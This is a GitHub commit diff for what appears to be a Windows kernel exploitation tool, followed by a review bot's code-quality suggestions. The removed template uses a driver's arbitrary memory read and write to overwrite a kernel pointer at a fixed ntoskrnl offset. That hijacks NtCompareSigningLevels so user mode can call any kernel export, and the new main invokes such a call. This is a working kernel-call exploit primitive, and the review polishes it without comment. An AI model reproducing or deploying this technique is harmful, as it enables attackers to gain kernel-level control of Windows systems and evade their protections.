refactor a ton of stuff + dynamic pointer gettin

This commit is contained in:
dpcpointer
2025-05-29 22:22:08 -06:00
committed by GitHub
parent 417931e7e2
commit e1974e0948
6 changed files with 436 additions and 218 deletions


@@ -1,54 +1,16 @@
#include "PdFwKrnl.h"
template <typename T, typename... Args>
T call_kernel_function(const char* function_name, Args... args){
uint64_t ntoskrnl_base = pdfwkrnl.get_ntoskrnl_base();
if (!ntoskrnl_base)
return T{};
uint64_t function_address = pdfwkrnl.get_ntoskrnl_export(function_name);
if (!function_address)
return T{};
uint64_t qword_swap = ntoskrnl_base + 0xC1DA00;
uint64_t qword_original = 0;
if (!pdfwkrnl.read_virtual_memory(qword_swap, &qword_original, sizeof(uint64_t)))
return T{};
if (!pdfwkrnl.write_virtual_memory(qword_swap, &function_address, sizeof(uint64_t)))
return T{};
HMODULE m_ntdll = GetModuleHandleA("ntdll.dll");
if (!m_ntdll)
return T{};
FARPROC NtCompareSigningLevels = GetProcAddress(m_ntdll, "NtCompareSigningLevels");
using FuncPtr = T(__stdcall*)(Args...);
if constexpr (std::is_void_v<T>) {
auto func = reinterpret_cast<void(__stdcall*)(Args...)>(NtCompareSigningLevels);
func(args...);
pdfwkrnl.write_virtual_memory(qword_swap, &qword_original, sizeof(uint64_t)); // swap back
return T{};
}
else {
auto func = reinterpret_cast<FuncPtr>(NtCompareSigningLevels);
T return_value = func(args...);
pdfwkrnl.write_virtual_memory(qword_swap, &qword_original, sizeof(uint64_t)); // swap back
return return_value;
}
}
int main() {
if (!pdfwkrnl.attach())
int main(void) {
if (!pdfwkrnl::attach()) {
printf(STR("failed to attach to driver \n"));
return -1;
}
printf("attached to kernel\n");
// a ntstatus of STATUS_INVALID_IMAGE_HASH or 0xC0000428 will always be returned as NtCompareSigningLevels always returns it if returned value by the called function is not equal then 0.
pdfwkrnl::call_kernel_function<void>(pdfwkrnl::get_kernel_export("DbgPrint"), "hello from pdfwkrnl!\n");
call_kernel_function<void>("DbgPrint", "called kernel function");
pdfwkrnl.detach();
return 0;
}
if (!pdfwkrnl::detach()) {
printf(STR("failed to detach from driver \n"));
return -1;
}
}
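Review bot: The export address returned by `pdfwkrnl::get_kernel_export("DbgPrint")` on the DbgPrint line is handed straight to `call_kernel_function` without being checked, whereas the removed template returned early when the resolved address was 0. Bind it first and bail out on failure, detaching on the way out: `const auto dbg_print = pdfwkrnl::get_kernel_export("DbgPrint");` / `if (!dbg_print) { printf(STR("failed to resolve DbgPrint \n")); pdfwkrnl::detach(); return -1; }` / `pdfwkrnl::call_kernel_function<void>(dbg_print, "hello from pdfwkrnl!\n");`. The new `call_kernel_function` now lives in PdFwKrnl.h and is not visible in this hunk, so whether it rejects a zero address itself is an assumption to confirm. The comment above that call is hard to parse; a clearer form is `// NtCompareSigningLevels reports any non-zero return from the called function as STATUS_INVALID_IMAGE_HASH (0xC0000428), so that status is expected here.`. The success path of main also relies on the implicit return 0; an explicit `return 0;` after the detach block, as the old code had, makes the intent visible.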